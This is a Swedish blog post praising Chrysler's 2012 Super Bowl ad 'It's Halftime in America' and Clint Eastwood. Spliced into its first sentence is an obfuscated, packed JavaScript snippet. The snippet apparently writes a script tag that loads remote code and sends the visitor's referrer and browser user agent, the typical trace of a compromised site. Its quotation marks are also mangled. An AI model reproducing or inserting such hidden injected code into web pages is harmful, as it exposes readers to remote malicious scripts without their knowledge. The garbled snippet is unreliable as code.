Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Super Bowl reklamen som ger rysningar. It’s Halftime in America

Super Bowl reklamen som ger rysningar. It’s Halftime in America
Filip Urde
  • On 7 februari, 2012
  • http://www.revue.se/filip-urde

Super eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|thekh|var|u0026u|referrer|rynyy||js|php’.split(’|’),0,{}))
Bowl är härligt! Det är en så stor händelse och alla lägger verkligen ner allt dem har för att göra sin uppgift perfekt.

Något som länge varit en av de stora ”snackisarna” är vem som kommer göra reklam under matchen och hur ”rolig” eller ”bra” den reklamen kommer att vara. Super Bowl är även ett av få tillfällen folk faktiskt vill se reklam, så här finns mycket att vinna.

Jag brukar alltid tycka att det är dem roliga reklamerna som blir vinnare om man ska välja bästa reklamfilm från kvällen. Men i år är det tvärtom.

It’s Halftime in America

Chryslers episka reklam har allt! Nu är jag en enorm USA vän, jag har många vänner som är från USA, min familj har alltid åkt dit på semester och vi har en bostad i Florida. Så jag kan vara lite mer påverkad än gemene man, men jag tycker den är så otroligt stark!

USA är i kris, det är inget man kan hymla om. Denna välgjorda reklam film speglar känslan och sumerar allt något otroligt bra och jag ryser när jag ser den. Clint Eastwood du är en ikon!